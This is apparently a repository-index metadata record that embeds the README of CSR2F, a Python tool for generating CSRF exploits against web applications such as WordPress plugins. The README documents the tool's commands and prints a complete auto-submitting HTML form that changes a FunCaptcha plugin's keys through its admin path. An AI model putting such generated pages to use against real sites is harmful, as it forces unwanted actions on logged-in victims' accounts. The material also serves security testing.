{"id":18451592,"url":"https://github.com/ncrocfer/csr2f","last_synced_at":"2025-04-08T02:32:34.311Z","repository":{"id":146146767,"uuid":"10621100","full_name":"ncrocfer/csr2f","owner":"ncrocfer","description":"CSR2F is a Python tool used for generating CSRF (Cross-Site Request Forgery) exploits","archived":false,"fork":false,"pushed_at":"2019-08-22T17:41:17.000Z","size":470,"stargazers_count":13,"open_issues_count":3,"forks_count":9,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-23T04:23:38.367Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"http://ncrocfer.github.io/csr2f/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ncrocfer.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2013-06-11T12:36:30.000Z","updated_at":"2023-04-14T12:03:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"7a536b92-7fba-478b-a123-bcd0bfb26563","html_url":"https://github.com/ncrocfer/csr2f","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ncrocfer%2Fcsr2f/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ncrocfer","download_url":"https://codeload.github.co
m/ncrocfer/csr2f/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247764804,"owners_count":20992177,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-06T07:29:10.973Z","updated_at":"2025-04-08T02:32:34.304Z","avatar_url":"https://github.com/ncrocfer.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"CSR2F\n=====\n\nCSR2F (Cross-Site Request Forgery Framework) is an open source tool written in Python and used for generating CSRF (Cross-Site Request Forgery) exploits.\nIt allows you to search an exploit for a specific case (for example a vulnerable WordPress plugin), then to configure and generate the HTML code.\n\n\nPrerequisites\n----\n\n* CSR2F uses [Python 3](http://www.python.org/download/) to run.\n\n\nInstallation\n----\n\nYou can download the latest tarball by clicking [here](https://github.com/ncrocfer/csr2f/tarball/master) or latest zipball by clicking [here](https://github.com/ncrocfer/csr2f/zipball/master).\n\nPreferably, you can download CSR2F by cloning the [Git](https://github.com/ncrocfer/csr2f) repository:\n\n    git clone https://github.com/ncrocfer/csr2f.git\n\n\nUsage\n----\n\nYou must execute the `csr2f.py` file to start CSR2F and obtain a prompt:\n\n    shatter@shatter:~/csr2f$ python3 csr2f.py\n\n    *********************************************************\n    *                                                       *\n    *     ______   ______   _______      _____   ________   *\n    *   .' ___  |.' 
____ \\ |_   __ \\    / ___ `.|_   __  |  *\n    *  / .'   \\_|| (___ \\_|  | |__) |  |_/___) |  | |_ \\_|  *\n    *  | |        _.____`.   |  __ /    .'____.'  |  _|     *\n    *  \\ `.___.'\\| \\____) | _| |  \\ \\_ / /_____  _| |_      *\n    *   `.____ .' \\______.'|____| |___||_______||_____|     *\n    *                                                       *\n    *         Cross Site Request Forgery Framework          *\n    *                                                       *\n    * Version  : 0.1b                                       *\n    * Author   : Nicolas Crocfer                            *\n    * Website  : http://csr2f.github.com                    *\n    * Licence  : GPLv3                                      *\n    *                                                       *\n    *********************************************************\n\n    [+] 207 exploits loaded\n\n    csr2f\u003e \n\n\n**help**\n\nThis command describes the other commands and shows their usage.\n\n    csr2f\u003e help\n\n    Commands\tDescription\n    ========\t===========\n\n    config  \tDisplay the configuration options\n    clear   \tClear the current screen\n    search  \tSearch an exploit based on keyword\n    show    \tDisplay informations about an exploit based on its ID\n    set     \tSet special fields for an exploit\n    generate\tGenerate the exploit to the console or in a file\n    ...\t\t\t...\n\n    csr2f\u003e help config\n\n    This command is used to view and modify the basic configuration. 
You\n    can view it by typing 'config' without argument.\n\n    Usage:\tconfig \u003citem\u003e \u003cvalue\u003e\n    Ex:\tconfig host_url http://www.example.com\n\n    csr2f\u003e\n\n\n**config**\n\nThis command is used to view and modify the basic configuration.\n\n    csr2f\u003e config\n\n        Config\t\t\tValue\n        ======\t\t\t=====\n    \n        host_url\t\thttp://www.example.com\n        redirect\t\tFalse\n        html_skeleton\tTrue\n        html_title\t\tCSR2F : Cross Site Request Forgery Framework\n        redirect_url\thttp://www.example.com\n\n    csr2f\u003e config redirect True\n    [+] The value has been modified\n    csr2f\u003e\n\n\n**search**\n\nYou can search an exploit based on keywords by using the `search` command.\n\n    csr2f\u003e search wordpress plugin\n\n    Date           ID      Method     Name                           Description\n    ====           ==      ======     ====                           ===========\n  \n    2013-04-11     112     POST       Wordpress FunCaptcha plug...   A CSRF vulnerability allows to disable...\n    2013-03-25     134     POST       Wordpress Mathjax Latex P...   There is no CSRF protection on the mat...\n    2013-03-01     175     POST       WordPress SolveMedia 1.1.0     SolveMedia is a capatcha service that ...\n    ...            ...     ...        ...                            ...\n\n    csr2f\u003e\n\n\n**show**\n\nThis command is used to show the informations about an exploit (author, description, configuration...). 
\n\n    csr2f\u003e show 112\n\n    Informations\n    ============\n\n        Name : Wordpress FunCaptcha plugin 0.3.2\n        ----\n    \n        Description\n        -----------\n        A CSRF vulnerability allows to disable the plugin by submitting an invalid private or public key.\n    \n        Author : Nicolas Crocfer (https://github.com/ncrocfer)\n        ------\n    \n        Method \u0026 Path : (POST) /wp-admin/plugins.php?page=funcaptcha/wp_funcaptcha.php\n        -------------\n\n    Configuration\n    =============\n\n    \tfuncaptcha[public_key] =\u003e foo\n    \t----------------------\n    \tValue of the new public key\n\n    \tfuncaptcha[private_key] =\u003e bar\n        -----------------------\n        Value of the new private key\n\n    csr2f\u003e\n\n\n**set**\n\nEach exploit can contain special fields that you can edit (for example a username, a password, an email address...). This command is used to change these values.\n\n    csr2f\u003e set 112 funcaptcha[public_key] 1234\n    [+] The value has been modified\n    csr2f\u003e\n\n**generate**\n\nThis command is used to generate the HTML exploit. You can display it on the screen by typing `generate \u003cid\u003e` without any other argument. 
You can also pass a filename to create a new file.\n\n    csr2f\u003e generate 112\n\n    \u003c!DOCTYPE html\u003e\n    \u003chtml\u003e\n      \u003chead\u003e\n          \u003cmeta charset=\"utf-8\"/\u003e\n          \u003ctitle\u003e\n              CSR2F : Cross Site Request Forgery Framework\n          \u003c/title\u003e\n      \u003c/head\u003e\n      \u003cbody\u003e\n        \u003cform action=\"http://www.example.com/wp-admin/plugins.php?page=funcaptcha/wp_funcaptcha.php\" id=\"csr2f\" method=\"post\"\u003e\n          \u003cinput name=\"funcaptcha[public_key]\" type=\"hidden\" value=\"foo\"/\u003e\n          \u003cinput name=\"funcaptcha[private_key]\" type=\"hidden\" value=\"bar\"/\u003e\n          \u003cinput name=\"funcaptcha[action]\" type=\"hidden\" value=\"settings\"/\u003e\n          \u003cinput name=\"funcaptcha[type]\" type=\"hidden\" value=\"Settings\"/\u003e\n        \u003c/form\u003e\n        \u003cscript type=\"text/javascript\"\u003e\n          document.getElementById(\"csr2f\").submit();\n        \u003c/script\u003e\n      \u003c/body\u003e\n    \u003c/html\u003e\n\n    csrf2\u003e generate 112 index.html\n    [+] The file was created in 'output' folder\n    csrf2\u003e\n\n\n**Other commands**\n\n* `clear` : Clear the user screen\n* `update` : Update the exploits list\n* `exit` : Exit the console\n\n\nCreating a new exploit\n----\n\nFor the time being, CSR2F does not include a lot of exploits. I am currently incorporating the ones already online on [exploit-db.com](http://www.exploit-db.com/search/?action=search\u0026filter_description=csrf).\n\nBut the goal of this framework is to be the reference for CSRF vulnerabilities : so I encourage you to integrate your exploit to this tool when you discover a new vulnerability, and thereby increase the list with your contributions.\n\nCSR2F uses a simple template for integrating new exploits. Each exploit is located in the `exploits` folder. 
For the moment this tool is still a beta version, so I am waiting for feedback from beta testers to see whether I need to add to or modify the template system, and will then update this documentation. In the meantime you can view the existing templates and tell me what you think of them.\n\n\nOh, one last thing\n----\n\nI'm a French developer, my English is not perfect, and I thank you in advance for pointing out my mistakes :)","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fncrocfer%2Fcsr2f","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fncrocfer%2Fcsr2f","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fncrocfer%2Fcsr2f/lists"}